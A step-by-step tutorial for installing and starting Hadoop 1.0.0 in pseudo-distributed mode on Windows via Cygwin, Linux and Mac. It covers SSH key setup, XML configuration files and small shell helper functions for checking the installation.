Installing Hadoop

This is a detailed step-by-step guide for installing Hadoop on Windows, Linux or MAC. It is based on Hadoop 1.0.0, which is the current and first official stable version. Hadoop 1.0.0 is itself based on version 0.20.0 (note that there was also a 0.21.0 version).

Installing Hadoop on Linux / MAC is pretty straightforward. However, getting it to run on Windows can be a bit tricky. You’d probably not run Hadoop on Windows in a production environment, but it can be convenient as a development environment. If you are using Linux/MAC, just skip the Windows-specific information.

Windows installation

Hadoop can be installed on Windows using Cygwin (not intended for production environments), but there are several Cygwin installation and configuration issues to watch for.

Windows: Download and install Cygwin

Cygwin is an implementation of a set of Linux commands and applications for Windows. Download the web installer from http://cygwin.com/setup.exe and run it.
The installer will request some information before installing:

  1. Installation method. Select “Install from Internet”.
  2. Root Directory. The default is c:\cygwin. Accept this directory.
  3. Local Package Directory (the directory where install files will be downloaded). The default is c:\cygwin-packages. Accept this directory.
  4. Connection and download site.
  5. A list of available packages will be displayed. The following packages are not selected by default, so make sure to include them:
    • openssh
    • openssl
    • tcp_wrappers
    • diffutils

    If several matching packages are listed (e.g. for openssl), include them all.

  6. Upon installation completion, it will create a Cygwin icon in the Desktop and/or Start menu. Click it to open a Cygwin window.

Configuring SSH on Windows

Hadoop requires SSH (Secure SHell) to be running. To configure it, open a Cygwin window and type:

ssh-host-config

Use the following installation options:

  • Should privilege separation be used? (yes/no) no
  • Do you want to install sshd as a service? yes
  • Enter the value of CYGWIN for the daemon: [] ntsec
  • If asked for an account name, specify cyg_server, with a password you’ll remember.

For example:

$ ssh-host-config

*** Info: Generating /etc/ssh_host_key
*** Info: Generating /etc/ssh_host_rsa_key
*** Info: Generating /etc/ssh_host_dsa_key
*** Info: Generating /etc/ssh_host_ecdsa_key
*** Info: Creating default /etc/ssh_config file
*** Info: Creating default /etc/sshd_config file
*** Info: Privilege separation is set to yes by default since OpenSSH 3.3.
*** Info: However, this requires a non-privileged account called 'sshd'.
*** Info: For more info on privilege separation read /usr/share/doc/openssh/README.privsep.
*** Query: Should privilege separation be used? (yes/no) no
*** Info: Updating /etc/sshd_config file

*** Query: Do you want to install sshd as a service?
*** Query: (Say "no" if it is already installed as a service) (yes/no) yes
*** Query: Enter the value of CYGWIN for the daemon: [] ntsec
*** Info: On Windows Server 2003, Windows Vista, and above, the
*** Info: SYSTEM account cannot setuid to other users -- a capability
*** Info: sshd requires.  You need to have or to create a privileged
*** Info: account.  This script will help you do so.

*** Info: You appear to be running Windows XP 64bit, Windows 2003 Server,
*** Info: or later.  On these systems, it's not possible to use the LocalSystem
*** Info: account for services that can change the user id without an
*** Info: explicit password (such as passwordless logins [e.g. public key
*** Info: authentication] via sshd).

*** Info: If you want to enable that functionality, it's required to create
*** Info: a new account with special privileges (unless a similar account
*** Info: already exists). This account is then used to run these special
*** Info: servers.

*** Info: Note that creating a new user requires that the current account
*** Info: have Administrator privileges itself.

*** Info: No privileged account could be found.

*** Info: This script plans to use 'cyg_server'.
*** Info: 'cyg_server' will only be used by registered services.
*** Query: Do you want to use a different name? (yes/no) no

*** Query: Create new privileged user account 'cyg_server'? (yes/no) yes
*** Info: Please enter a password for new user cyg_server.  Please be sure
*** Info: that this password matches the password rules given on your system.
*** Info: Entering no password will exit the configuration.
*** Query: Please enter the password:
*** Query: Reenter: Enter password

*** Info: User 'cyg_server' has been created with password '####'.
*** Info: If you change the password, please remember also to change the
*** Info: password for the installed services which use (or will soon use)
*** Info: the 'cyg_server' account.

*** Info: Also keep in mind that the user 'cyg_server' needs read permissions
*** Info: on all users' relevant files for the services running as 'cyg_server3'.
*** Info: In particular, for the sshd server all users' .ssh/authorized_keys
*** Info: files must have appropriate permissions to allow public key
*** Info: authentication. (Re-)running ssh-user-config for each user will set
*** Info: these permissions correctly. [Similar restrictions apply, for
*** Info: instance, for .rhosts files if the rshd server is running, etc].

*** Info: The sshd service has been installed under the 'cyg_server'
*** Info: account.  To start the service now, call `net start sshd' or
*** Info: `cygrunsrv -S sshd'.  Otherwise, it will start automatically
*** Info: after the next reboot.

*** Info: Host configuration finished. Have fun!

The installation script creates:

  • configuration files:
    • /etc/ssh_config
    • /etc/ssh_host_dsa_key
    • /etc/ssh_host_ecdsa_key
    • /etc/ssh_host_key
    • /etc/ssh_host_rsa_key
    • /etc/sshd_config
  • cyg_server privileged account.
  • sshd Windows service, using the specified account and password, and listed under the name CYGWIN sshd.

IMPORTANT: Do not run ssh-host-config again without first removing the existing files and account. The script changes access permissions on the configuration files so that they can only be accessed by ssh services. If the sshd service, configuration files and account are not created together, the script fails to configure the file permissions and no error is reported.

Cleaning up ssh

If you run into any issues, delete the six files listed above and remove the created service using:

cygrunsrv -R sshd

and start over.

You should now be able to start the sshd service and log in using your password. However, in order to run Hadoop you need to create a key, so that you can establish an ssh session without specifying a password. To do this, type

ssh-keygen

and accept all default options (no passphrase).

$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/AccountName/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/AccountName/.ssh/id_rsa.
Your public key has been saved in /home/AccountName/.ssh/id_rsa.pub.
The key fingerprint is:
9b:51:11:ea:c4:a4:72:fe:70:e7:dd:f1:ea:34:ac:0f AccountName@ServerName
The key's randomart image is:
+--[ RSA 2048]----+
|        . o.     |
|       + . .     |
|    . o + .      |
|     + o .       |
|      o S .   .  |
|       + * . o o |
|        + . E = .|
|             + o |
|            .o+  |
+-----------------+

Copy the generated RSA public key into the authorized_keys file, to allow logging in without a password.

cd ~/.ssh
cat id_rsa.pub >> authorized_keys

Try connecting locally:

ssh localhost

You should be able to connect without specifying a password.
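
Note that appending with >> adds a duplicate entry every time the command is re-run, and sshd commonly ignores authorized_keys when its permissions are too open. The following is only a sketch of how both points could be handled; the function name authorize_key and its optional directory argument are made up for this example and are not part of Cygwin or OpenSSH.

```shell
# Hypothetical helper: add a public key to authorized_keys exactly once.
# $1 = ssh directory (defaults to ~/.ssh), assumed to contain id_rsa.pub.
authorize_key() {
    ssh_dir="${1:-$HOME/.ssh}"
    pub_key="$ssh_dir/id_rsa.pub"
    auth_file="$ssh_dir/authorized_keys"

    [ -f "$pub_key" ] || { echo "missing $pub_key" >&2; return 1; }

    touch "$auth_file"
    # -x: whole-line match, -F: fixed string, -f: read the pattern from the key file
    if ! grep -qxFf "$pub_key" "$auth_file"; then
        cat "$pub_key" >> "$auth_file"
    fi

    # sshd usually refuses keys when these are accessible to other users
    chmod 700 "$ssh_dir"
    chmod 600 "$auth_file"
}
```

Calling authorize_key with no argument operates on ~/.ssh; running it a second time leaves the file unchanged.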

Configuring SSH on Linux / MAC

When running on Linux / MAC, all you have to do is make sure that the SSH server is running and that it has the keys it needs, so that no password is requested.
Check that the SSH server is running (ssh localhost). If it’s not running, start it:

  • Linux
    • Start it as a service. Note that net start sshd is the Windows (Cygwin) command; on Linux, use your distribution’s service manager.
      Under Windows, the service is created as “CYGWIN sshd”, using the “.sshd” account. However, this account may not be configured correctly to read the server certificates.
    • Start it as a process: /usr/sbin/sshd
  • MAC
    Go to System preferences -> Internet & Wireless -> Sharing -> Enable “Remote login” service.

You should create a key so that ssh does not request a password every time a session is established. Verify that ssh localhost does not request a user/passphrase. If it does, create a key and add it to the authorized_keys file.

ssh-keygen -t dsa -P '' -f ~/.ssh/id_dsa
cat ~/.ssh/id_dsa.pub >> ~/.ssh/authorized_keys
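
To verify the result without being fooled by an interactive prompt, ssh can be asked to fail instead of prompting. This is a minimal sketch, assuming the host key for localhost has already been accepted once (for example by an earlier interactive ssh localhost); the function name check_passwordless_ssh is invented for illustration.

```shell
# Hypothetical helper: succeed only if key-based login works without any prompt.
# $1 = host to test (defaults to localhost).
check_passwordless_ssh() {
    host="${1:-localhost}"
    # BatchMode=yes makes ssh fail instead of asking for a password or passphrase;
    # ConnectTimeout keeps it from hanging when sshd is not reachable.
    if ssh -o BatchMode=yes -o ConnectTimeout=5 "$host" true; then
        echo "passwordless ssh to $host works"
    else
        echo "passwordless ssh to $host failed" >&2
        return 1
    fi
}
```

A non-zero return value means Hadoop's start scripts would most likely stop at a password prompt as well.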

Download Hadoop

Current Hadoop version is 1.0.0. Hadoop is organized as 3 projects:

  • Common: Functionality shared by all projects (logging, utilities, etc).
  • HDFS: Hadoop Distributed File System.
  • MapReduce: Map-Reduce implementation. It allows performing distributed queries on the distributed file system. Explained later.

They are downloaded together from http://hadoop.apache.org/ as a single .tar.gz / .rpm / .deb file.

Unpack Hadoop to any directory. The recommended install directory is /usr/local/hadoop-1.0.0, but you can use any other directory.
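
For the .tar.gz download, unpacking could look like the sketch below. The function name unpack_hadoop is made up for this example, and it assumes the archive contains a single top-level directory named after the archive (e.g. hadoop-1.0.0.tar.gz unpacking to hadoop-1.0.0/); check the real archive before relying on that.

```shell
# Hypothetical helper: unpack a Hadoop tarball and print the resulting directory.
# $1 = path to the .tar.gz archive, $2 = parent directory to install into.
unpack_hadoop() {
    archive="$1"
    dest="$2"
    mkdir -p "$dest" || return 1
    tar -xzf "$archive" -C "$dest" || return 1
    # Assumption: the archive holds one top-level directory named after
    # the archive itself, e.g. hadoop-1.0.0.tar.gz -> hadoop-1.0.0/
    echo "$dest/$(basename "$archive" .tar.gz)"
}
```

For example, unpack_hadoop hadoop-1.0.0.tar.gz /usr/local would print /usr/local/hadoop-1.0.0 (writing to /usr/local normally requires root privileges).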

Configure Hadoop

There are 3 basic modes in which Hadoop can be configured:

  • Local (Standalone) Mode: Everything runs in a single Java process on a single node, with no replication.
  • Pseudo-Distributed Mode: Services run on a single node, but as separate Java processes.
  • Fully-Distributed Mode: Real distributed environment.

Hadoop configuration is stored in XML files located in the conf/ directory of the Hadoop installation. They all share the same key-value format, stored as a sequence of:

  <property>
    <name>Property name</name>
    <value>Property value</value>
  </property>

Pseudo-Distributed Mode is the ideal development mode. Minimum configuration files for pseudo-distributed mode are shown below:

  • conf/core-site.xml:
    <configuration>
      <property>
        <name>fs.default.name</name>
        <value>hdfs://localhost:9000</value>
      </property>
    </configuration>
  • conf/hdfs-site.xml:
    <configuration>
      <property>
        <name>dfs.replication</name>
        <value>1</value>
      </property>
    </configuration>
  • conf/mapred-site.xml:
    <configuration>
      <property>
        <name>mapred.job.tracker</name>
        <value>localhost:9001</value>
      </property>
    </configuration>
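
Since all three files share the same structure, they can also be generated rather than typed by hand. The sketch below is one possible way to do it; the function names are invented for this example, values are written as-is (no XML escaping), and existing files in the target directory are overwritten.

```shell
# Hypothetical helpers for writing Hadoop *-site.xml files.

# Print one <property> element. $1 = name, $2 = value.
hadoop_property() {
    printf '  <property>\n    <name>%s</name>\n    <value>%s</value>\n  </property>\n' "$1" "$2"
}

# Write a complete site file. $1 = output file, followed by name/value pairs.
write_site_file() {
    out="$1"; shift
    {
        echo '<configuration>'
        while [ "$#" -ge 2 ]; do
            hadoop_property "$1" "$2"
            shift 2
        done
        echo '</configuration>'
    } > "$out"
}

# Generate the three minimal pseudo-distributed files into directory $1.
write_pseudo_distributed_conf() {
    conf_dir="$1"
    mkdir -p "$conf_dir" || return 1
    write_site_file "$conf_dir/core-site.xml"   fs.default.name    hdfs://localhost:9000
    write_site_file "$conf_dir/hdfs-site.xml"   dfs.replication    1
    write_site_file "$conf_dir/mapred-site.xml" mapred.job.tracker localhost:9001
}
```

It is safer to generate into a scratch directory first and compare the result with the existing conf/ files before copying anything over.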

If no paths are specified, Hadoop temporary and data files are located in the system tmp directory. So any installation should begin by defining the tmp and HDFS directories, as shown below:

  • conf/core-site.xml:
    <configuration>
      <property>
        <name>hadoop.tmp.dir</name>
        <value>/tmp/hadoop-${user.name}</value>
      </property>
    
      <property>
        <name>fs.default.name</name>
        <value>hdfs://localhost:9000</value>
      </property>
    </configuration>
  • conf/hdfs-site.xml:
    <configuration>
      <property>
        <name>dfs.replication</name>
        <value>1</value>
      </property>
    
      <property>
        <name>dfs.name.dir</name>
        <value>/home/${user.name}/hdfs/name</value>
      </property>
    
      <property>
        <name>dfs.data.dir</name>
        <value>/home/${user.name}/hdfs/data</value>
      </property>
    </configuration>
  • conf/mapred-site.xml:
    <configuration>
      <property>
        <name>mapred.job.tracker</name>
        <value>localhost:9001</value>
      </property>
    </configuration>

Under Windows, specify paths in full URI format. For example:

  <property>
    <name>dfs.name.dir</name>
    <value>file:///c:/hdfs/name</value>
  </property>

Start Hadoop

Format NameNode

Before starting Hadoop, you have to format the NameNode. This is the node that holds the file system structure (the metadata). To format the NameNode, run:

cd /usr/local/hadoop-1.0.0
./bin/hadoop namenode -format

Several files will be created under the directory defined for the configuration key dfs.name.dir.
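
Formatting again later wipes the existing file system metadata, so it can be worth guarding the command. The sketch below is an illustration only: the function names are made up, and it assumes that a formatted dfs.name.dir contains a current/VERSION file, which you should confirm against your own directory after the first format.

```shell
# Hypothetical guard: report whether a NameNode directory already holds metadata.
# $1 = the directory configured as dfs.name.dir.
# Assumption: a formatted directory contains current/VERSION.
namenode_is_formatted() {
    [ -f "$1/current/VERSION" ]
}

# Format only when no existing metadata is found.
# $1 = Hadoop install directory, $2 = dfs.name.dir path.
format_namenode_once() {
    if namenode_is_formatted "$2"; then
        echo "NameNode at $2 is already formatted, skipping"
    else
        "$1/bin/hadoop" namenode -format
    fi
}
```

For example: format_namenode_once /usr/local/hadoop-1.0.0 "$HOME/hdfs/name".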

Start HDFS

bin/start-dfs.sh

Check that HDFS is running by browsing to http://localhost:50070/.
A web page should be displayed with DFS information, where you can view and browse the directory structure.
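
The page may take a few seconds to become available after the start script returns. On a machine without a browser, the same check can be scripted. This is a rough sketch that assumes curl is installed; the function name wait_for_url is invented for this example.

```shell
# Hypothetical helper: poll a URL until it answers or the attempts run out.
# $1 = URL, $2 = maximum number of attempts (default 30), one second apart.
wait_for_url() {
    url="$1"
    tries="${2:-30}"
    while [ "$tries" -gt 0 ]; do
        # -f: treat HTTP errors as failure, -s: silent, -o /dev/null: discard the page
        if curl -fs -o /dev/null "$url"; then
            echo "$url is up"
            return 0
        fi
        tries=$((tries - 1))
        sleep 1
    done
    echo "$url did not respond" >&2
    return 1
}
```

For example: wait_for_url http://localhost:50070/ 60.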

If you run into any issues, check the log files under hadoop-1.0.0/logs/ for errors.

You can also browse the file system using bin/hadoop fs -ls. Type bin/hadoop fs for the complete set of commands.

Under MAC/OSX you might get an “Unable to load realm info from SCDynamicStore” error. If you run into this issue, add the following line:

export HADOOP_OPTS="-Djava.security.krb5.realm=OX.AC.UK -Djava.security.krb5.kdc=kdc0.ox.ac.uk:kdc1.ox.ac.uk"

at the beginning of conf/hadoop-env.sh

Start MapReduce (JobTracker)

bin/start-mapred.sh

Check that JobTracker has started by browsing to http://localhost:50030/.
A page with scheduled jobs should be displayed.

Check hadoop-1.0.0/logs/ for errors.
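
Another quick check is to list the running Java processes with jps (shipped with the JDK) and confirm that the daemons started by start-dfs.sh and start-mapred.sh are all present. The sketch below assumes a pseudo-distributed setup, where all five daemons run on the same machine; the function name missing_daemons is made up for illustration.

```shell
# Hypothetical helper: read `jps` output on stdin and print every expected
# Hadoop daemon that is NOT listed. Returns 0 only when all five are present.
missing_daemons() {
    jps_output=$(cat)
    missing=0
    for daemon in NameNode DataNode SecondaryNameNode JobTracker TaskTracker; do
        # jps prints "<pid> <main class>"; compare the second column exactly
        if ! printf '%s\n' "$jps_output" |
            awk -v d="$daemon" '$2 == d { found = 1 } END { exit !found }'; then
            echo "$daemon"
            missing=1
        fi
    done
    return "$missing"
}
```

Run it as jps | missing_daemons; any name it prints points to the log file to inspect first.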

Check HDFS and JobTracker by opening http://localhost:50070/ and http://localhost:50030/ respectively.
